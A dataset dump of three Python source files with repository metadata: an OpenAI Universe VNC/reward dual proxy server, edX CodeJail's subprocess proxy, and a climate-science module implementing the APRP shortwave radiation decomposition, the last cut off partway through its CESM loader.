text stringlengths 0 1.05M | meta dict |
|---|---|
# a proxy server that handles both reward channel and vnc.
from twisted.python import log
from autobahn.twisted import websocket
import logging
import os
import time
import pexpect
import sys
import threading
from universe.vncdriver.vnc_proxy_server import VNCProxyServer
from universe.rewarder.reward_proxy_server import RewardProxyServer
from universe import utils
logger = logging.getLogger(__name__)
class DualProxyServer(VNCProxyServer):
    """A proxy server that handles both the reward channel and VNC.

    Extends VNCProxyServer by spawning a separate reward-proxy subprocess
    when the VNC client completes its handshake, and tearing it down (plus
    uploading recorded logs to S3) when the connection closes.
    """

    def __init__(self, action_queue=None, error_buffer=None, enable_logging=True):
        self._log_info('DualProxyServer inited')
        # Handle to the spawned reward proxy child process (pexpect).
        self.reward_proxy = None
        # Set for real in recv_ClientInit; initialized here so close() cannot
        # hit an AttributeError if the connection dies before the handshake.
        self.logfile_dir = None
        super(DualProxyServer, self).__init__(action_queue, error_buffer, enable_logging)

    def _log_info(self, msg, *args, **kwargs):
        # Prefix every message so this server's output is easy to grep.
        logger.info('[dual_proxy] ' + msg, *args, **kwargs)

    def recv_ClientInit(self, block):
        """Spawn the reward proxy, wait for it to come up, then proceed
        with the normal VNC ClientInit handling."""
        self._log_info('Starting reward proxy server')
        self.reward_proxy = pexpect.spawnu(self.factory.reward_proxy_bin,
                                           logfile=sys.stdout,
                                           timeout=None)
        # Wait on the reward proxy to be up. Raw string: '\[' is an invalid
        # escape in a plain literal (SyntaxWarning on modern Python); the
        # regex matched is unchanged.
        self._log_info('Waiting for reward proxy server')
        self.reward_proxy.expect(r'\[RewardProxyServer\]')
        # Keep draining the child's output in the background so its pipe
        # never fills up and blocks it.
        self.reward_proxy_thread = threading.Thread(target=lambda: self.reward_proxy.expect(pexpect.EOF))
        self.reward_proxy_thread.start()
        self._log_info('Reward proxy server is up %s', self.reward_proxy.before)
        super(DualProxyServer, self).recv_ClientInit(block)
        self.logfile_dir = self.log_manager.logfile_dir

    def close(self):
        """Close connections, stop the reward proxy, and upload logs."""
        # End connections first.
        super(DualProxyServer, self).close()
        # Then stop the rewarder child, if it was ever started.
        if self.reward_proxy:
            self.reward_proxy.terminate()
        # Upload to S3 (acknowledged hacky). NOTE(review): shell command is
        # built by % interpolation; values come from our own factory config,
        # but a subprocess.run([...]) list form would be safer.
        logger.info('log manager = %s', self.log_manager)
        if self.log_manager:
            os.system('/app/universe/bin/upload_directory.sh demonstrator_%(recorder_id)s %(directory)s %(bucket)s' %
                      dict(recorder_id=self.factory.recorder_id, directory=self.logfile_dir,
                           bucket=self.factory.bucket)
                      )
| {
"repo_name": "openai/universe",
"path": "universe/vncdriver/dual_proxy_server.py",
"copies": "2",
"size": "2271",
"license": "mit",
"hash": -6322280845916708000,
"line_mean": 35.0476190476,
"line_max": 117,
"alpha_frac": 0.6428885953,
"autogenerated": false,
"ratio": 3.9427083333333335,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5585596928633333,
"avg_score": null,
"num_lines": null
} |
"""A proxy subprocess-making process for CodeJail."""
import ast
import logging
import os
import os.path
import subprocess
import sys
import time
import six
from six.moves import range
from .subproc import run_subprocess
log = logging.getLogger("codejail")
# We use .readline to get data from the pipes between the processes, so we need
# to ensure that a newline does not appear in the data. We also need a way to
# communicate a few values, and unpack them. Lastly, we need to be sure we can
# handle binary data. Serializing with repr() and deserializing the literals
# that result give us all the properties we need.
# Pick (de)serialization functions for the line-oriented pipe protocol,
# depending on the Python major version.
if six.PY2:
    # Python 2: everything is bytes everywhere.
    serialize_in = serialize_out = repr
    deserialize_in = deserialize_out = ast.literal_eval
else:
    # Python 3: the outside of subprocess talks in bytes (the pipes from
    # subprocess.* are all about bytes). The inside of the Python code it runs
    # talks in text (reading from sys.stdin is text, writing to sys.stdout
    # expects text).
    def serialize_out(val):
        """Send data out of the proxy process. Needs to make unicode."""
        return repr(val)

    def serialize_in(val):
        """Send data into the proxy process. Needs to make bytes."""
        return serialize_out(val).encode('utf8')

    def deserialize_in(ustr):
        """Get data into the proxy process. Needs to take unicode."""
        return ast.literal_eval(ustr)

    def deserialize_out(bstr):
        """Get data from the proxy process. Needs to take bytes."""
        return deserialize_in(bstr.decode('utf8'))
##
# Client code, runs in the parent CodeJail process.
##
def run_subprocess_through_proxy(*args, **kwargs):
    """
    Works just like :ref:`run_subprocess`, but through the proxy process.
    This will retry a few times if need be.
    """
    last_exception = None
    for _attempt in range(3):
        try:
            proxy = get_proxy()
            # Ship this call's args/kwargs to the proxy as one serialized line.
            request = serialize_in((args, kwargs))
            proxy.stdin.write(request + b"\n")
            proxy.stdin.flush()
            # Block until the proxy finishes the work and writes its one-line
            # reply; an empty read means the proxy died.
            reply = proxy.stdout.readline()
            if not reply:
                raise Exception("Proxy process died unexpectedly!")
            status, stdout, stderr, log_calls = deserialize_out(reply.rstrip())
            # Replay the proxy's captured log records into our own logger.
            for level, msg, msg_args in log_calls:
                log.log(level, msg, *msg_args)
            return status, stdout, stderr
        except Exception:  # pylint: disable=broad-except
            log.exception("Proxy process failed")
            # Give the proxy process a chance to die completely if it is dying.
            time.sleep(.001)
            # Must call sys.exc_info() while still inside the except clause.
            last_exception = sys.exc_info()
    # All retries failed: re-raise the most recent failure.
    if last_exception:
        six.reraise(*last_exception)
# There is one global proxy process, created lazily and restarted on death.
PROXY_PROCESS = None


def get_proxy():
    """Return the global proxy subprocess, (re)starting it if needed."""
    global PROXY_PROCESS  # pylint: disable=global-statement
    # If we had a proxy process, but it died, clean up.
    if PROXY_PROCESS is not None:
        status = PROXY_PROCESS.poll()
        if status is not None:
            log.info(
                "CodeJail proxy process (pid %d) ended with status code %d",
                PROXY_PROCESS.pid,
                status
            )
            PROXY_PROCESS = None
    # If we need a proxy, make a proxy.
    if PROXY_PROCESS is None:
        # Start the proxy by invoking proxy_main.py in our root directory.
        root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
        proxy_main_py = os.path.join(root, "proxy_main.py")
        # Run proxy_main.py with the same Python that is running us. "-u" makes
        # the stdin and stdout unbuffered. We pass the log level of the
        # "codejail" log so that the proxy can send back an appropriate level
        # of detail in the log messages.
        log_level = log.getEffectiveLevel()
        cmd = [sys.executable, '-u', proxy_main_py, str(log_level)]
        # stderr is merged into the stdout pipe; the child immediately
        # redirects its own stderr to devnull (see proxy_main), which keeps
        # the reply protocol on stdout clean.
        PROXY_PROCESS = subprocess.Popen(
            args=cmd,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
        )
        log.info("Started CodeJail proxy process (pid %d)", PROXY_PROCESS.pid)
    return PROXY_PROCESS
##
# Proxy process code
##
class CapturingHandler(logging.Handler):
    """
    A logging Handler that captures all the log calls, for later replay.
    NOTE: this doesn't capture all aspects of the log record. It only captures
    the log level, the message string, and the arguments. It does not capture
    the caller, the current exception, the current time, etc.
    """

    # pylint wants us to override emit().
    # pylint: disable=abstract-method

    def __init__(self):
        super().__init__()
        # Accumulated (levelno, msg, args) tuples, in arrival order.
        self.log_calls = []

    def createLock(self):
        # No locking needed: capture is single-threaded by design.
        self.lock = None

    def handle(self, record):
        # Bypass filtering/locking entirely; just record the essentials.
        self.log_calls.append((record.levelno, record.msg, record.args))

    def get_log_calls(self):
        """Return the captured calls and reset the capture buffer."""
        captured, self.log_calls = self.log_calls, []
        return captured
def proxy_main(argv):
    """
    The main program for the proxy process.
    It does this:
    * Reads a line from stdin with the repr of a tuple: (args, kwargs)
    * Calls :ref:`run_subprocess` with *args, **kwargs
    * Writes one line to stdout: the repr of the return value from
      `run_subprocess` and the log calls made:
      (status, stdout, stderr, log_calls) .
    The process ends when its stdin is closed.
    `argv` is the argument list of the process, from sys.argv. The only
    argument is the logging level for the "codejail" log in the parent
    process. Since we tunnel our logging back to the parent, we don't want to
    send everything, just the records that the parent will actually log.
    """
    # We don't want to see any noise on stderr: the parent merges our stderr
    # into the stdout reply pipe (see get_proxy), so stray output there would
    # corrupt the line-oriented protocol.
    sys.stderr = open(os.devnull, "w")
    # Capture all logging messages so they can be shipped back to the parent.
    capture_log = CapturingHandler()
    log.addHandler(capture_log)
    # argv[1] is the parent's effective level; a value of 0 (NOTSET) falls
    # back to DEBUG via the `or`.
    log.setLevel(int(argv[1]) or logging.DEBUG)
    log.debug("Starting proxy process")
    try:
        while True:
            # One request per line; EOF (empty read) means the parent closed
            # our stdin and we should exit.
            stdin = sys.stdin.readline()
            log.debug("proxy stdin: %r", stdin)
            if not stdin:
                break
            args, kwargs = deserialize_in(stdin.rstrip())
            status, stdout, stderr = run_subprocess(*args, **kwargs)
            log.debug(
                "run_subprocess result: status=%r\nstdout=%r\nstderr=%r",
                status, stdout, stderr,
            )
            # Drain captured log records and send them with the result as a
            # single reply line.
            log_calls = capture_log.get_log_calls()
            stdout = serialize_out((status, stdout, stderr, log_calls))
            sys.stdout.write(stdout+"\n")
            sys.stdout.flush()
    except Exception:  # pylint: disable=broad-except
        # Note that this log message will not get back to the parent, because
        # we are dying and not communicating back to the parent. This will be
        # useful only if you add another handler at the top of this function.
        log.exception("Proxy dying due to exception")
    log.debug("Exiting proxy process")
| {
"repo_name": "edx/codejail",
"path": "codejail/proxy.py",
"copies": "1",
"size": "7585",
"license": "apache-2.0",
"hash": 4488364234049718000,
"line_mean": 33.1666666667,
"line_max": 86,
"alpha_frac": 0.6287409361,
"autogenerated": false,
"ratio": 4.106659447753113,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5235400383853113,
"avg_score": null,
"num_lines": null
} |
# APRP.py: module containing functions, etc. related to the Approximate Partial Radiation Perturbation method
# (Taylor et al., 2007). Based on Matlab code written by Yen-Ting Hwang.
#
# To run, import this module into an outside script and then run "aprp_main" for
# the desired model
import numpy as np
import netCDF4 as nc4
#Main function to run, for an individual model (which model is specified via the "dataPaths" arguments).
#This version assumes variable names and dimensions following CMIP convention.
#
#Inputs:
# dataPaths1: dictionary of paths to the netCDF output for time period 1
# firstMonth1: first month (indexed from beginning of output) for time period 1--note Python indices start with 0
# lastMonth1: last month (indexed from beginning of output) for time period 1
# dataPaths2: dictionary of paths to the netCDF output for time period 2
# (if the two states being compared are different times from the same run, make this the same as dataPaths1)
# firstMonth2: first month (indexed from beginning of output) for time period 2
# lastMonth2: last month (indexed from beginning of output) for time period 2
#
#Outputs:
# A dictionary of dictionaries:
# returnDict['APRP']: contains results from comparing the two time periods (see "d_albedo" function for list of variables)
# returnDict['Time1_preliminaries']: contains the relevant model output variables, having been read in from NetCDF
# files, and processed including cloudy-sky calculations and multiannual means
# returnDict['Time2_preliminaries']: same as above but for time period 2 (see "loadNetCDF" function for list of variables)
# returnDict['Time1_parameters']: contains tuning parameters for the idealized single-layer radiative transfer model
# returnDict['Time2_parameters']: same as above but for time period 2 (see "parameters" function for list of variables)
# Syntax for accessing: e.g. to get the radiative effect of surface albedo changes, type returnDict['APRP']['surface']
#
def aprp_main(dataPaths1, firstMonth1, lastMonth1, dataPaths2, firstMonth2, lastMonth2):
    """Run the full APRP analysis for one model (CMIP variable names).

    Loads both time periods, fits the single-layer-model parameters for
    each, and decomposes the change between them.  Returns a dict of dicts:
    'APRP' (the decomposition), 'TimeN_preliminaries' (loaded/processed
    fluxes), and 'TimeN_parameters' (fitted model parameters).
    """
    # Preliminaries and tuning parameters, one pair per time period.
    prelim1 = loadNetCDF(dataPaths1, firstMonth1, lastMonth1)
    params1 = parameters(prelim1)
    prelim2 = loadNetCDF(dataPaths2, firstMonth2, lastMonth2)
    params2 = parameters(prelim2)
    # APRP decomposition of the change between the two periods.
    aprp = d_albedo(prelim1, params1, prelim2, params2)
    return {
        'APRP': aprp,
        'Time1_preliminaries': prelim1,
        'Time1_parameters': params1,
        'Time2_preliminaries': prelim2,
        'Time2_parameters': params2,
    }
#Load variables from netCDF files (run twice, once for each time) and calculate overcast sky data.
#Based on "load_nc_coupled.m" in Ting's code.
#Inputs: see aprp_main
#Outputs: a dictionary containing monthly mean SW fluxes at surface and TOA under all-sky, clear-sky and
# overcast conditions, as well as the model's latitude and longitude grids. These are monthly mean
# data; unlike in Ting's code, not doing multi-annual mean yet. Better to do APRP calculations on
# the individual months.
def loadNetCDF(dataPaths, firstMonth, lastMonth):
    """Load CMIP-convention SW fluxes and derive overcast-sky fields.

    Parameters
    ----------
    dataPaths : dict
        Maps each CMIP variable name (rsds, rsus, rsut, rsdt, rsutcs,
        rsdscs, rsuscs, clt) to the path of its netCDF file.
    firstMonth, lastMonth : int
        Inclusive 0-based month indices into each file's time axis.

    Returns
    -------
    dict with multiannual monthly-mean (12, lat, lon) arrays for each flux,
    derived overcast fluxes (rsdsoc/rsusoc/rsutoc), cloud fraction 'c'
    (0-1), and the model's 'lat'/'lon' grids.

    Refactor note: the original read each variable with eight copy-pasted
    stanzas (and mused about an eval() loop); this version loops over the
    variable names with a dict, which is equivalent and avoids eval.
    """
    # CMIP variable names: each is read from its own file, subset in time,
    # and masked above 1e10 (missing-data fill values).
    variables = ['rsds', 'rsus', 'rsut', 'rsdt', 'rsutcs', 'rsdscs', 'rsuscs', 'clt']
    raw = {}
    Dataset = None
    for name in variables:
        Dataset = nc4.Dataset(dataPaths[name])
        data = Dataset.variables[name][firstMonth:lastMonth+1, :, :]
        raw[name] = np.ma.masked_greater(data, 1.e10)
    # Latitude/longitude grid, read from the last Dataset opened (all files
    # are assumed to share the same grid — as in the original code).
    lat = Dataset.variables['lat'][:]
    lon = Dataset.variables['lon'][:]
    # Multiannual means for each calendar month: average every 12th time
    # step, yielding (12, lat, lon) arrays (month index 0-11).
    numMonths = lastMonth - firstMonth + 1
    monthly = {}
    for name in variables:
        m = np.zeros([12, len(lat), len(lon)])
        for i in range(12):
            m[i, :, :] = np.mean(raw[name][i:numMonths:12, :, :], axis=0)
        monthly[name] = m
    # Mask zero cloud fraction so overcast values aren't computed in
    # clear-sky pixels; clt is in percent, so c is the 0-1 fraction.
    m_clt = np.ma.masked_values(monthly['clt'], 0)
    c = m_clt/100.
    # Overcast fluxes, derived algebraically from Taylor et al. (2007),
    # Eq. 3: all-sky = c*overcast + (1-c)*clear-sky.
    m_rsdsoc = (monthly['rsds']-(1.-c)*(monthly['rsdscs']))/c
    m_rsusoc = (monthly['rsus']-(1.-c)*(monthly['rsuscs']))/c
    m_rsutoc = (monthly['rsut']-(1.-c)*(monthly['rsutcs']))/c
    # Mask zero values of the downward SW radiation (polar night for monthly
    # means) so later flux ratios don't divide by zero.
    m_rsds = np.ma.masked_values(monthly['rsds'], 0)
    m_rsdscs = np.ma.masked_values(monthly['rsdscs'], 0)
    m_rsdsoc = np.ma.masked_values(m_rsdsoc, 0)
    m_rsdt = np.ma.masked_values(monthly['rsdt'], 0)
    # Same output keys as before ("dictA": produced by the first stage).
    dictA = {
        'rsds': m_rsds,
        'rsus': monthly['rsus'],
        'rsut': monthly['rsut'],
        'rsdt': m_rsdt,
        'rsutcs': monthly['rsutcs'],
        'rsdscs': m_rsdscs,
        'rsuscs': monthly['rsuscs'],
        'clt': m_clt,
        'lat': lat,
        'lon': lon,
        'rsdsoc': m_rsdsoc,
        'rsusoc': m_rsusoc,
        'rsutoc': m_rsutoc,
        'c': c,  # Cloud fraction as fraction, not %
    }
    return dictA
#Calculate the tuning parameters for the idealized single-layer radiative transfer model
#for the individual time period (i.e. control or warmed)
#See Figure 1 of Taylor et al., 2007, and other parts of that paper. Equations referenced are from there.
#
#Based on Ting's "parameters.m".
#
#Inputs: the dictionary output by loadNetCDF
#Outputs: a dictionary of additional outputs
def parameters(dictA):
    """Fit the tuning parameters of the idealized single-layer radiative
    transfer model for one time period (Taylor et al., 2007, Fig. 1).

    Input: the dictionary produced by loadNetCDF.
    Output: dict with surface albedos (a_clr, a_oc), atmospheric
    transmittances (mu_clr, mu_cld) and scattering coefficients
    (ga_clr, ga_cld).  Equation numbers refer to Taylor et al. (2007).
    """
    rsdt = dictA['rsdt']
    # Clear-sky fit: surface albedo, incident-flux ratio, transmittance,
    # and scattering coefficient.
    a_clr = dictA['rsuscs'] / dictA['rsdscs']
    q = dictA['rsdscs'] / rsdt
    mu_clr = dictA['rsutcs']/rsdt + q*(1. - a_clr)      # Eq. 9
    ga_clr = (mu_clr - q) / (mu_clr - a_clr*q)          # Eq. 10
    # Overcast fit, same quantities.
    a_oc = dictA['rsusoc'] / dictA['rsdsoc']
    q = dictA['rsdsoc'] / rsdt
    mu_oc = dictA['rsutoc']/rsdt + q*(1. - a_oc)        # Eq. 9
    ga_oc = (mu_oc - q) / (mu_oc - a_oc*q)              # Eq. 10
    # Cloud-only parameters: the cloud's own contribution, separated from
    # the combined overcast-atmosphere values.
    return {
        'a_clr': a_clr,
        'a_oc': a_oc,
        'mu_clr': mu_clr,
        'mu_cld': mu_oc / mu_clr,                       # Eq. 14
        'ga_clr': ga_clr,
        'ga_cld': (ga_oc - 1.)/(1. - ga_clr) + 1.,      # Eq. 13
    }
#Calculations for the differences between time periods
def d_albedo(dict1A, dict1B, dict2A, dict2B):
#First, Ting set cloud values that were masked in one time period
#equal to the value in the other time period, assuming no cloud changes.
#I'll take these variables out of the dictionary before modifying them.
a_oc1 = dict1B['a_oc']
a_oc2 = dict2B['a_oc']
a_oc2[a_oc2.mask == True] = a_oc1[a_oc2.mask == True]
a_oc1[a_oc1.mask == True] = a_oc2[a_oc1.mask == True]
mu_cld1 = dict1B['mu_cld']
mu_cld2 = dict2B['mu_cld']
mu_cld2[mu_cld2.mask == True] = mu_cld1[mu_cld2.mask == True]
mu_cld1[mu_cld1.mask == True] = mu_cld2[mu_cld1.mask == True]
ga_cld1 = dict1B['ga_cld']
ga_cld2 = dict2B['ga_cld']
ga_cld2[ga_cld2.mask == True] = ga_cld1[ga_cld2.mask == True]
ga_cld1[ga_cld1.mask == True] = ga_cld2[ga_cld1.mask == True]
#Now a bunch of calls to the "albedo" function to see how the albedo changes as a result of
#...the changes to each of the radiative components.
#Retrieve other variables from dictionaries to make calls to albedo shorter/more readable
c1 = dict1A['c']
c2 = dict2A['c']
a_clr1 = dict1B['a_clr']
a_clr2 = dict2B['a_clr']
mu_clr1 = dict1B['mu_clr']
mu_clr2 = dict2B['mu_clr']
ga_clr1 = dict1B['ga_clr']
ga_clr2 = dict2B['ga_clr']
#Base state albedo
A1 = albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)
A2 = albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2)
#Change in albedo due to each component (Taylor et al., 2007, Eq. 12b)
dA_c = .5*(albedo(c2, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c1, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_a_clr = .5*(albedo(c1, a_clr2, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr1, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_a_oc = .5*(albedo(c1, a_clr1, a_oc2, mu_clr1, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc1, mu_clr2, mu_cld2, ga_clr2, ga_cld2))
dA_mu_clr = .5*(albedo(c1, a_clr1, a_oc1, mu_clr2, mu_cld1, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr1, mu_cld2, ga_clr2, ga_cld2))
dA_mu_cld = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld2, ga_clr1, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld1, ga_clr2, ga_cld2))
dA_ga_clr = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr2, ga_cld1)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr1, ga_cld2))
dA_ga_cld = .5*(albedo(c1, a_clr1, a_oc1, mu_clr1, mu_cld1, ga_clr1, ga_cld2)-A1)+.5*(
A2-albedo(c2, a_clr2, a_oc2, mu_clr2, mu_cld2, ga_clr2, ga_cld1))
#Set changes due to overcast or cloudy sky parameters, or changes to clouds themselves, to zero
#...if cloud fraction is less than 3% in either time period
dA_a_oc[dict1A['c'] < .03] = 0
dA_a_oc[dict2A['c'] < .03] = 0
dA_mu_cld[dict1A['c'] < .03] = 0
dA_mu_cld[dict2A['c'] < .03] = 0
dA_ga_cld[dict1A['c'] < .03] = 0
dA_ga_cld[dict2A['c'] < .03] = 0
dA_c[dict1A['c'] < .03] = 0
dA_c[dict2A['c'] < .03] = 0
#Combine different components into changes due to surface albedo, atmospheric clear-sky and atmospheric cloudy-sky
dA_a = dA_a_clr + dA_a_oc #Eq. 16a
dA_cld = dA_mu_cld + dA_ga_cld + dA_c #Eq. 16b
dA_clr = dA_mu_clr + dA_ga_clr #Eq. 16c
#Set all planetary albedo changes = zero when incoming solar radaition is zero
#(This will replace NaNs with zeros in the polar night--affects annual means)
dA_a[dict2A['rsdt']<0.1] = 0
dA_clr[dict2A['rsdt']<0.1] = 0
dA_cld[dict2A['rsdt']<0.1] = 0
dA_a_clr[dict2A['rsdt']<0.1] = 0
dA_a_oc[dict2A['rsdt']<0.1] = 0
dA_mu_cld[dict2A['rsdt']<0.1] = 0
dA_ga_cld[dict2A['rsdt']<0.1] = 0
dA_c[dict2A['rsdt']<0.1] = 0
dA_mu_clr[dict2A['rsdt']<0.1] = 0
dA_ga_clr[dict2A['rsdt']<0.1] = 0
#Calculate radiative effects in W/m^2 by multiplying negative of planetary albedo changes by downward SW radation
#(This means positive changes mean more downward SW absorbed)
surface = -dA_a*dict2A['rsdt'] #Radiative effect of surface albedo changes
surface[dict2A['rsdt']<0.1] = 0
surface = np.ma.masked_outside(surface, -100, 100) # Ting called this "boundary for strange output"
cloud = -dA_cld*dict2A['rsdt'] #Radiative effect of cloud changes
cloud[dict2A['rsdt']<0.1] = 0
cloud = np.ma.masked_outside(cloud, -100, 100) # Ting called this "boundary for strange output"
noncloud = -dA_clr*dict2A['rsdt'] #Radiative effect of non-cloud SW changes (e.g. SW absorption)
noncloud[dict2A['rsdt']<0.1] = 0
#Broken down further into the individual terms in Eq. 16
surface_clr = -dA_a_clr*dict2A['rsdt'] #Effects of surface albedo in clear-sky conditions
surface_clr[dict2A['rsdt']<0.1] = 0
surface_oc = -dA_a_oc*dict2A['rsdt'] #Effects of surface albedo in overcast conditions
surface_oc[dict2A['rsdt']<0.1] = 0
cloud_c = -dA_c*dict2A['rsdt'] #Effects of changes in cloud fraction
cloud_c[dict2A['rsdt']<0.1] = 0
cloud_ga = -dA_ga_cld*dict2A['rsdt'] #Effects of atmospheric scattering in cloudy conditions
cloud_ga[dict2A['rsdt']<0.1] = 0
cloud_mu = -dA_mu_cld*dict2A['rsdt'] #Effects of atmospheric absorption in cloudy conditions
cloud_mu[dict2A['rsdt']<0.1] = 0
noncloud_ga = -dA_ga_clr*dict2A['rsdt'] #Effects of atmospheric scattering in clear-sky conditions
noncloud_ga[dict2A['rsdt']<0.1] = 0
noncloud_mu = -dA_mu_clr*dict2A['rsdt'] #Effects of atmospheric absorption in clear-sky conditions
noncloud_mu[dict2A['rsdt']<0.1] = 0
#Calculate more useful radiation output
CRF = dict1A['rsut'] - dict1A['rsutcs'] - dict2A['rsut'] + dict2A['rsutcs'] #Change in cloud radiative effect
cs = dict1A['rsutcs'] - dict2A['rsutcs'] #Change in clear-sky upward SW flux at TOA
#Define a dictionary to return all the variables calculated here
dictC = dict()
dictC['A1'] = A1
dictC['A2'] = A2
dictC['dA_c'] = dA_c
dictC['dA_a_clr'] = dA_a_clr
dictC['dA_a_oc'] = dA_a_oc
dictC['dA_mu_clr'] = dA_mu_clr
dictC['dA_mu_cld'] = dA_mu_cld
dictC['dA_ga_clr'] = dA_ga_clr
dictC['dA_ga_cld'] = dA_ga_cld
dictC['dA_a'] = dA_a
dictC['dA_cld'] = dA_cld
dictC['dA_clr'] = dA_clr
dictC['surface'] = surface
dictC['cloud'] = cloud
dictC['noncloud'] = noncloud
dictC['surface_clr'] = surface_clr
dictC['surface_oc'] = surface_oc
dictC['cloud_c'] = cloud_c
dictC['cloud_ga'] = cloud_ga
dictC['cloud_mu'] = cloud_mu
dictC['noncloud_ga'] = noncloud_ga
dictC['noncloud_mu'] = noncloud_mu
dictC['CRF'] = CRF
dictC['cs'] = cs
return dictC
#Function to calculate the planetary albedo, A.
#Inputs: (see Fig. 1 of Taylor et al., 2007)
# c: fraction of the region occupied by clouds
# a_clr: clear sky surface albedo (SW flux up / SW flux down)
# a_oc: overcast surface albedo
# mu_clr: clear-sky transmittance of SW radiation
# mu_cld: cloudy-sky transmittance of SW radiation
# ga_clr: clear-sky atmospheric scattering coefficient
# ga_cld: cloudy-sky atmospheric scattering coefficient
def albedo(c, a_clr, a_oc, mu_clr, mu_cld, ga_clr, ga_cld):
    """Planetary albedo from the single-layer model of Taylor et al. (2007).

    c is the cloud fraction; a_* are surface albedos, mu_* transmittances,
    and ga_* scattering coefficients for clear ('clr') and cloud ('cld')
    components.  Equation numbers refer to Taylor et al. (2007).
    """
    # Composite overcast-atmosphere parameters from the clear and
    # cloud-only pieces.
    mu_oc = mu_clr*mu_cld                      # Eq. 14
    ga_oc = 1. - (1.-ga_clr)*(1.-ga_cld)       # Eq. 13

    def _sky_albedo(mu, ga, a):
        # Eq. 7: direct reflection plus surface reflection with multiple
        # atmospheric passes.
        return mu*ga + mu*a*(1.-ga)*(1.-ga)/(1.-a*ga)

    # Cloud-fraction-weighted blend of clear and overcast skies (Eq. 15).
    return (1-c)*_sky_albedo(mu_clr, ga_clr, a_clr) + c*_sky_albedo(mu_oc, ga_oc, a_oc)
#### Alternative versions for CESM model runs with different output variable names ####
#Alternative main function to run the different loading function
def aprp_main_cesm(dataPaths1, firstMonth1, lastMonth1, dataPaths2, firstMonth2, lastMonth2):
    """Run the full APRP analysis for CESM output.

    Identical to aprp_main except that files are read with loadNetCDF_cesm,
    which understands CAM variable names.  Returns the same nested dict.
    """
    # Preliminaries and tuning parameters, one pair per time period.
    prelim1 = loadNetCDF_cesm(dataPaths1, firstMonth1, lastMonth1)
    params1 = parameters(prelim1)
    prelim2 = loadNetCDF_cesm(dataPaths2, firstMonth2, lastMonth2)
    params2 = parameters(prelim2)
    # APRP decomposition of the change between the two periods.
    aprp = d_albedo(prelim1, params1, prelim2, params2)
    return {
        'APRP': aprp,
        'Time1_preliminaries': prelim1,
        'Time1_parameters': params1,
        'Time2_preliminaries': prelim2,
        'Time2_parameters': params2,
    }
#Loading function for CESM output variable names (output the same as the loadNetCDF() function)
def loadNetCDF_cesm(dataPaths, firstMonth, lastMonth):
    """Load CESM/CAM-named SW fluxes, translate to CMIP names, and derive
    overcast-sky fields.  Output dict is identical in shape/keys to
    loadNetCDF's.

    Parameters
    ----------
    dataPaths : dict
        Maps each CAM variable name (FSDS, FSNS, FSUTOA, FSNTOA, FSNTOAC,
        FSDSC, FSNSC, CLDTOT) to the path of its netCDF file.
    firstMonth, lastMonth : int
        Inclusive 0-based month indices into each file's time axis.

    Refactor note: the original read each variable with eight copy-pasted
    stanzas; this version loops over the variable names with a dict, which
    is equivalent.
    """
    # CAM variable names: each is read from its own file, subset in time,
    # and masked above 1e10 (missing-data fill values).
    vars_cam = ['FSDS', 'FSNS', 'FSUTOA', 'FSNTOA', 'FSNTOAC', 'FSDSC', 'FSNSC', 'CLDTOT']
    raw = {}
    Dataset = None
    for name in vars_cam:
        Dataset = nc4.Dataset(dataPaths[name])
        data = Dataset.variables[name][firstMonth:lastMonth+1, :, :]
        raw[name] = np.ma.masked_greater(data, 1.e10)
    # Translate to CMIP names used by the rest of the program.  CAM reports
    # net (positive-down) fluxes, so: up = down - net, down = net + up.
    cmip = {}
    cmip['rsds'] = raw['FSDS']
    cmip['rsut'] = raw['FSUTOA']
    cmip['rsdscs'] = raw['FSDSC']
    cmip['clt'] = raw['CLDTOT']
    cmip['rsus'] = raw['FSDS'] - raw['FSNS']
    cmip['rsdt'] = raw['FSUTOA'] + raw['FSNTOA']
    cmip['rsuscs'] = raw['FSDSC'] - raw['FSNSC']
    # Downward SW at TOA is the same regardless of clouds.
    cmip['rsutcs'] = cmip['rsdt'] - raw['FSNTOAC']
    ####### from here down, same processing as the CMIP loadNetCDF #######
    # Latitude/longitude grid, read from the last Dataset opened.
    lat = Dataset.variables['lat'][:]
    lon = Dataset.variables['lon'][:]
    # Multiannual means for each calendar month: (12, lat, lon) arrays.
    numMonths = lastMonth - firstMonth + 1
    monthly = {}
    for name in ['rsds', 'rsus', 'rsut', 'rsdt', 'rsutcs', 'rsdscs', 'rsuscs', 'clt']:
        m = np.zeros([12, len(lat), len(lon)])
        for i in range(12):
            m[i, :, :] = np.mean(cmip[name][i:numMonths:12, :, :], axis=0)
        monthly[name] = m
    # Mask zero cloud fraction so overcast values aren't computed in
    # clear-sky pixels.  Unlike CMIP clt, CESM CLDTOT is already a 0-1
    # fraction, so no /100 here.
    m_clt = np.ma.masked_values(monthly['clt'], 0)
    c = m_clt
    # Overcast fluxes, derived algebraically from Taylor et al. (2007), Eq. 3.
    m_rsdsoc = (monthly['rsds']-(1.-c)*(monthly['rsdscs']))/c
    m_rsusoc = (monthly['rsus']-(1.-c)*(monthly['rsuscs']))/c
    m_rsutoc = (monthly['rsut']-(1.-c)*(monthly['rsutcs']))/c
    # Mask zero values of the downward SW radiation (polar night).
    m_rsds = np.ma.masked_values(monthly['rsds'], 0)
    m_rsdscs = np.ma.masked_values(monthly['rsdscs'], 0)
    m_rsdsoc = np.ma.masked_values(m_rsdsoc, 0)
